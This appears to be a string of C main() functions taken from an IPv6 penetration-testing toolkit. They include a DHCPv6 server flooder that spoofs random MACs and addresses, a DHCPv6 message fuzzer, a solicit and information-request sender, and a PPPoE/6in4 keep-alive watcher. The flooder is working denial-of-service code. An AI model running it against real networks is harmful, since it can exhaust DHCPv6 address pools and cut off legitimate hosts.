int main(int argc, char *argv[]) { char mac[6] = { 0, 0x0c, 0, 0, 0, 0 }, *pkt = NULL; char wdatabuf[1024]; unsigned char *mac6 = mac, *src, *dst; int i, s, len, pkt_len = 0, dlen = 0; unsigned long long int count = 0; pcap_t *p = NULL; int do_all = 1, use_real_mac = 0, use_real_link = 0; if (argc < 2 || strncmp(argv[1], "-h", 2) == 0) help(argv[0]); if (getenv("THC_IPV6_PPPOE") != NULL || getenv("THC_IPV6_6IN4") != NULL) printf("WARNING: %s is not working with injection!\n", argv[0]); while ((i = getopt(argc, argv, "d:nNr1")) >= 0) { switch (i) { case 'N': use_real_link = 1; // no break case 'n': use_real_mac = 1; break; case '1': do_all = 0; break; case 'd': do_dns = 1; dns_name = optarg; break; case 'r': i = 0; break; // just to ignore -r default: fprintf(stderr, "Error: unknown option -%c\n", i); exit(-1); } } memset(mac, 0, sizeof(mac)); interface = argv[optind]; if (use_real_link) src = thc_get_own_ipv6(interface, NULL, PREFER_LINK); else src = thc_resolve6("fe80::"); if (use_real_mac) mac6 = thc_get_own_mac(interface); if (argc - optind <= 1) dst = thc_resolve6("ff02::1:2"); else dst = thc_resolve6(argv[optind + 1]); setvbuf(stdout, NULL, _IONBF, 0); setvbuf(stderr, NULL, _IONBF, 0); if (src == NULL || mac6 == NULL) { fprintf(stderr, "Error: invalid interface %s or bad mac/IP defined\n", interface); exit(-1); } // only to prevent our system to send icmp port unreachable messages if ((s = thc_bind_udp_port(546)) < 0) fprintf(stderr, "Warning: could not bind to 546/udp\n"); if ((p = thc_pcap_init_promisc(interface, "ip6 and udp and dst port 546")) == NULL) { fprintf(stderr, "Error: can not open interface %s in promisc mode\n", interface); exit(-1); } len = sizeof(solicit); memcpy(wdatabuf, solicit, len); if (do_dns) { memcpy(wdatabuf + len, dnsupdate1, sizeof(dnsupdate1)); dlen = len + 8; len += sizeof(dnsupdate1); if (dns_name != NULL && strlen(dns_name) < 240) { if (dns_name[0] != '.') { wdatabuf[len] = '.'; wdatabuf[dlen - 5]++; wdatabuf[dlen - 3]++; len++; } memcpy(wdatabuf + len, dns_name, strlen(dns_name) + 1); wdatabuf[dlen - 5] += strlen(dns_name) + 1; wdatabuf[dlen - 3] += strlen(dns_name) + 1; len += strlen(dns_name) + 1; } memcpy(wdatabuf + len, dnsupdate2, sizeof(dnsupdate2)); len += sizeof(dnsupdate2); } printf("Starting to flood dhcp6 servers locally on %s (Press Control-C to end) ...\n\n", interface); while (1) { count++; if (!use_real_link) memcpy(src + 8, (char *) &count, 8); // start0: 1-3 rand, 18-21 rand, 22-27 mac, 32-35 rand for (i = 0; i < 3; i++) { wdatabuf[i + 32] = rand() % 256; wdatabuf[i + 18] = rand() % 256; mac[i + 2] = rand() % 256; if (do_dns) wdatabuf[i + dlen] = 'a' + rand() % 26; } if (!use_real_mac) memcpy(wdatabuf + 22, mac, 6); memcpy(wdatabuf + 1, (char *) &count + _TAKE3, 3); if ((pkt = thc_create_ipv6_extended(interface, PREFER_LINK, &pkt_len, src, dst, 1, 0, 0, 0, 0)) == NULL) return -1; if (thc_add_udp(pkt, &pkt_len, 546, 547, 0, wdatabuf, len) < 0) return -1; // we have to tone it down, otherwise we will not get advertisements if (thc_generate_and_send_pkt(interface, mac6, NULL, pkt, &pkt_len) < 0) printf("!"); pkt = thc_destroy_packet(pkt); if (do_all) { usleep(75); while (thc_pcap_check(p, (char *) check_packets, NULL) > 0); } if (count % 1000 == 0) printf("."); } return 0; // never reached }
int main(int argc, char *argv[]) { char mac[6] = { 0, 0x0c, 0, 0, 0, 0 }, *pkt = NULL; // defines mac as 6 pieces and defines pkt as null. char wdatabuf[1024]; //builds data buffer and sets memory size at 1024mb unsigned char *mac6 = mac, *src, *dst; //creates mac6 address usuing int i, s, len, pkt_len = 0, dlen = 0; int do_all = 1, use_real_mac = 1, use_real_link = 1; int state; if (argc < 2 || strncmp(argv[1], "-h", 2) == 0) help(argv[0]); if (getenv("THC_IPV6_PPPOE") != NULL || getenv("THC_IPV6_6IN4") != NULL) printf("WARNING: %s is not working with injection!\n", argv[0]); //Parse options while ((i = getopt(argc, argv, "123456789mn:t:e:T:dFp:fr")) >= 0) { switch (i) { case '1': do_type = DO_SOL; break; case '2': do_type = DO_REQ; break; case '3': do_type = DO_CON; break; case '4': do_type = DO_REN; break; case '5': do_type = DO_REB; break; case '6': do_type = DO_REL; break; case '7': do_type = DO_DEC; break; case '8': do_type = DO_INF; break; case 'm': fuzz_msg_type = 1; break; case 'n': no_send = atoi(optarg); break; case 't': test_start = atoi(optarg); break; case 'e': test_end = atoi(optarg); break; case 'T': test_end = test_start = atoi(optarg); break; case 'F': use_real_link = 0; // no break case 'f': use_real_mac = 0; break; case 'p': ping = atoi(optarg); break; case 'd': do_dns = 1; break; case 'r': i = 0; break; // just to ignore -r default: fprintf(stderr, "Error: unknown option -%c\n", i); exit(-1); } } //Check options if (no_send < 1) { fprintf(stderr, "ERROR: -n number must be between one and 2 billion\n"); exit(-1); } if (test_end < test_start) { printf("don't f**k up the command line options!\n"); exit(-1); } memset(mac, 0, sizeof(mac)); interface = argv[optind]; dns_name = argv[optind + 1]; if (use_real_link) src = thc_get_own_ipv6(interface, NULL, PREFER_LINK); else src = thc_resolve6("fe80::"); if (use_real_mac) { mac6 = thc_get_own_mac(interface); memcpy(mac, mac6, sizeof(mac)); } dst = thc_resolve6("ff02::1:2"); setvbuf(stdout, NULL, _IONBF, 0); setvbuf(stderr, NULL, _IONBF, 0); // only to prevent our system to send icmp port unreachable messages if ((s = thc_bind_udp_port(546)) < 0) fprintf(stderr, "Warning: could not bind to 546/udp\n"); if ((p = thc_pcap_init_promisc(interface, "ip6 and udp and dst port 546")) == NULL) { fprintf(stderr, "Error: can not open interface %s in promisc mode\n", interface); exit(-1); } //Establish state if (do_type == DO_SOL || do_type == DO_REB) state = STATELESS; else state = STATEFULL; // generate full fuzz mask for stateless types and partial for statefull types strcpy(fuzzbuf, fuzztype_ether); strcat(fuzzbuf, fuzztype_ip6); strcat(fuzzbuf, fuzztype_udp); if (fuzz_msg_type) strcat(fuzzbuf, fuzztype_dhcp6); else strcat(fuzzbuf, fuzztype_dhcp6no); if (state == STATELESS) { strcat(fuzzbuf, fuzztype_elapsed_time); strcat(fuzzbuf, fuzztype_client_identifier); strcat(fuzzbuf, fuzztype_IA_NA); if (do_dns) strcat(fuzzbuf, fuzztype_FQDN); } /** Generate packet **/ len = sizeof(solicit); memcpy(wdatabuf, solicit, len); //Add dns option if (do_dns) { memcpy(wdatabuf + len, dnsupdate1, sizeof(dnsupdate1)); memcpy(dns_option_hdr + dns_option_hdr_len, dnsupdate1, sizeof(dnsupdate1)); dlen = len + 8; len += sizeof(dnsupdate1); dns_option_hdr_len += sizeof(dnsupdate1); //Append domain string prefix fuzz mask if (state == STATELESS) { //<-- Do fuzzbuffer later for (i = 0; i < 7; ++i) //7 == Length of hard coded domain prefix strcat(fuzzbuf, "B"); } if (dns_name != NULL && strlen(dns_name) < 240) { if (dns_name[0] != '.') { wdatabuf[len] = '.'; wdatabuf[dlen - 5]++; wdatabuf[dlen - 3]++; len++; } memcpy(wdatabuf + len, dns_name, strlen(dns_name) + 1); memcpy(dns_option_hdr + dns_option_hdr_len, dns_name, strlen(dns_name) + 1); wdatabuf[dlen - 5] += strlen(dns_name) + 1; wdatabuf[dlen - 3] += strlen(dns_name) + 1; len += strlen(dns_name) + 1; dns_option_hdr_len += strlen(dns_name) + 1; //Append variable length domain string suffix fuzz mask if (state == STATELESS) { for (i = 0; i < strlen(dns_name) + 1; ++i) strcat(fuzzbuf, "B"); } } memcpy(wdatabuf + len, dnsupdate2, sizeof(dnsupdate2)); memcpy(dns_option_hdr + dns_option_hdr_len, dnsupdate2, sizeof(dnsupdate2)); len += sizeof(dnsupdate2); dns_option_hdr_len += sizeof(dnsupdate2); //Append option request (FQDN request) fuzz mask if (state == STATELESS){ strcat(fuzzbuf, fuzztype_option_request); } } //Set message type if (state == STATELESS) { switch (do_type) { case DO_SOL: wdatabuf[0] = 0x01; break; case DO_REB: wdatabuf[0] = 0x06; break; default: break; } } //random src mac if (!use_real_link) for (i = 0; i < 8; i++) src[i + 8] = rand() % 256; // start0: 1-3 rand, 18-21 rand, 22-27 mac, 32-35 rand for (i = 0; i < 3; i++) { wdatabuf[i + 1] = rand() % 256; wdatabuf[i + 18] = rand() % 256; wdatabuf[i + 32] = rand() % 256; if (!use_real_mac) { mac[i * 2] = rand() % 256; mac[i * 2 + 1] = rand() % 256; } if (do_dns) wdatabuf[i + dlen] = 'a' + rand() % 26; } memcpy(wdatabuf + 22, mac, 6); if ((pkt = thc_create_ipv6_extended(interface, PREFER_LINK, &pkt_len, src, dst, 1, 0, 0, 0, 0)) == NULL) return -1; if (thc_add_udp(pkt, &pkt_len, 546, 547, 0, wdatabuf, len) < 0) return -1; if (thc_generate_pkt(interface, mac6, NULL, pkt, &pkt_len) < 0) return -1; //Fuzz solicit packet if (state == STATELESS) { if (fuzz_loop(pkt, &pkt_len) < 0) return -1; } //Fuzz request, confirm or renew paket else if (state == STATEFULL) { //Send a dhcp solicit to discover dhcpv6 servers if (thc_send_pkt(interface, pkt, &pkt_len) < 0) { fprintf(stderr, "Error: Failed to send initial solicit packet\n"); return -1; } usleep(75); //<-- I don't really know why this is neccessary but it seems to be //Construct and fuzz packets using server identifier got_packet = 0; time_t start_time = time(NULL); while(time(NULL) - start_time < timeout) { while (thc_pcap_check(p, (char *) construct_from_adv_and_fuzz, NULL) > 0); //got_packet set in callback function if (got_packet) break; } if (!got_packet) fprintf(stderr, "Timeout: Didn't receive solicited advertisement packet within timeout. Is server down?\n"); } pkt = thc_destroy_packet(pkt); // printf("fuzzbuf: %s\n", fuzzbuf); return 0; }
int main(int argc, char *argv[]) { char mac[6] = { 0, 0x0c, 0, 0, 0, 0 }, *pkt = NULL, *pkt2 = NULL; char wdatabuf[1024], wdatabuf2[1024]; unsigned char *mac6 = mac, *src, *dst; int i, s, len, len2, pkt_len = 0, pkt2_len = 0; unsigned long long int count = 0; pcap_t *p = NULL; int do_all = 1, use_real_mac = 1, use_real_link = 1; if (argc < 2 || strncmp(argv[1], "-h", 2) == 0) help(argv[0]); if (getenv("THC_IPV6_PPPOE") != NULL || getenv("THC_IPV6_6IN4") != NULL) printf("WARNING: %s is not working with injection!\n", argv[0]); while ((i = getopt(argc, argv, "dnNr1")) >= 0) { switch (i) { case 'N': use_real_link = 1; // no break case 'n': use_real_mac = 1; break; case '1': do_all = 0; break; case 'r': i = 0; break; // just to ignore -r default: fprintf(stderr, "Error: unknown option -%c\n", i); exit(-1); } } memset(mac, 0, sizeof(mac)); interface = argv[optind]; if (thc_get_own_ipv6(interface, NULL, PREFER_LINK) == NULL) { fprintf(stderr, "Error: invalid interface %s\n", interface); exit(-1); } dns_name = argv[optind + 1]; if (use_real_link) src = thc_get_own_ipv6(interface, NULL, PREFER_LINK); else src = thc_resolve6("fe80::"); if (use_real_mac) mac6 = thc_get_own_mac(interface); dst = thc_resolve6("ff02::1:2"); setvbuf(stdout, NULL, _IONBF, 0); setvbuf(stderr, NULL, _IONBF, 0); // only to prevent our system to send icmp port unreachable messages if ((s = thc_bind_udp_port(546)) < 0) fprintf(stderr, "Warning: could not bind to 546/udp\n"); if ((p = thc_pcap_init_promisc(interface, "ip6 and udp and dst port 546")) == NULL) { fprintf(stderr, "Error: can not open interface %s in promisc mode\n", interface); exit(-1); } len = sizeof(solicit); memcpy(wdatabuf, solicit, len); len2 = sizeof(inforeq); memcpy(wdatabuf2, inforeq, len2); printf("Sending DHCPv6 Solicitate message ...\n"); printf("Sending DHCPv6 Information Request message ...\n"); if (!use_real_link) memcpy(src + 8, (char *) &count, 8); // start0: 1-3 rand, 18-21 rand, 22-27 mac, 32-35 rand for (i = 0; i < 3; i++) { wdatabuf[i + 32] = rand() % 256; wdatabuf[i + 18] = rand() % 256; mac[i + 2] = rand() % 256; } if (!use_real_mac) memcpy(wdatabuf + 22, mac, 6); if (!use_real_mac) memcpy(wdatabuf2 + 18, mac, 6); memcpy(wdatabuf + 1, (char *) &count + _TAKE3, 3); memcpy(wdatabuf2 + 1, (char *) &count + _TAKE3, 3); if ((pkt = thc_create_ipv6_extended(interface, PREFER_LINK, &pkt_len, src, dst, 1, 0, 0, 0, 0)) == NULL) return -1; if (thc_add_udp(pkt, &pkt_len, 546, 547, 0, wdatabuf, len) < 0) return -1; if (thc_generate_and_send_pkt(interface, mac6, NULL, pkt, &pkt_len) < 0) printf("!"); if ((pkt2 = thc_create_ipv6_extended(interface, PREFER_LINK, &pkt2_len, src, dst, 1, 0, 0, 0, 0)) == NULL) return -1; if (thc_add_udp(pkt2, &pkt2_len, 546, 547, 0, wdatabuf2, len2) < 0) return -1; if (thc_generate_and_send_pkt(interface, mac6, NULL, pkt2, &pkt2_len) < 0) printf("!"); signal(SIGALRM, clean_exit); alarm(3); // i = thc_send_pkt(interface, pkt, &pkt_len); pkt = thc_destroy_packet(pkt); while (1) { usleep(75); while (thc_pcap_check(p, (char *) check_packets, NULL) > 0); } return 0; // never reached }
int main(int argc, char *argv[]) { char sndbuf[128], data[] = { 0x09, 0x0a, 0x00, 0x0c, 0xfa, 0xce, 0xba, 0xbe, 0x1f, 0x1e, 0x1d, 0x1c }; time_t passed = 0; pcap_t *p; thc_ipv6_hdr hdr; int sndbuflen = 0, i; if (argc < 2 || strncmp(argv[1], "-h", 2) == 0) help(argv[0]); while ((i = getopt(argc, argv, "adp")) >= 0) { switch(i) { case 'a': active = 1; break; case 'd': debug = 1; break; case 'p': passive = 1; break; default: fprintf(stderr, "Error: invalid option -%c\n", i); exit(-1); } } if (getenv("THC_IPV6_PPPOE") != NULL) type = 1; else if (getenv("THC_IPV6_6IN4") != NULL) type = 2; if (type == 0) { fprintf(stderr, "Error: neither the THC_IPV6_PPPOE nor THC_IPV6_6IN4 environment variable is set\n"); exit(-1); } if (type == 2 && active) fprintf(stderr, "Error: active ping6 sending in for THC_IPV6_6IN4 is not possible. Please use thcping6 or alive6 to perform the active alive packet sending.\n"); interface = argv[optind]; if (thc_get_own_mac(interface) == NULL) { fprintf(stderr, "Error: invalid interface %s\n", interface); exit(-1); } printf("Started %s keep-alive watcher on %s (Press Control-C to end) ...\n", type == 1 ? "PPPoE" : "6in4", argv[optind]); if (active == 1 && type == 1) { if ((p = thc_pcap_init_promisc(interface, "it does not matter what we put here")) == NULL) { fprintf(stderr, "Error: Could not set interface into promiscious mode\n"); exit(-1); } memcpy(sndbuf, do_hdr, do_hdr_size); sndbuf[18 + do_hdr_off] = 0x00; sndbuf[19 + do_hdr_off] = sizeof(data) + 2; sndbuf[20 + do_hdr_off] = 0xc0; sndbuf[21 + do_hdr_off] = 0x21; memcpy(sndbuf + do_hdr_size, data, sizeof(data)); sndbuflen = do_hdr_size + sizeof(data); hdr.pkt = sndbuf; hdr.pkt_len = sndbuflen; while (1) { thc_pcap_check(p, (char *) intercept, NULL); usleep(100); if (passed <= time(NULL)) { if (thc_send_pkt(interface, (unsigned char*) &hdr, &sndbuflen) < 0) { fprintf(stderr, "Error: could not send packet to interface %s\n", interface); return -1; } passed = time(NULL) + 15; } } } else { thc_pcap_function(interface, "it does not matter what we put here", (char *) intercept, 1, NULL); fprintf(stderr, "Error: Could not set interface into promiscious mode\n"); exit(-1); } return -1; // never reached unless error }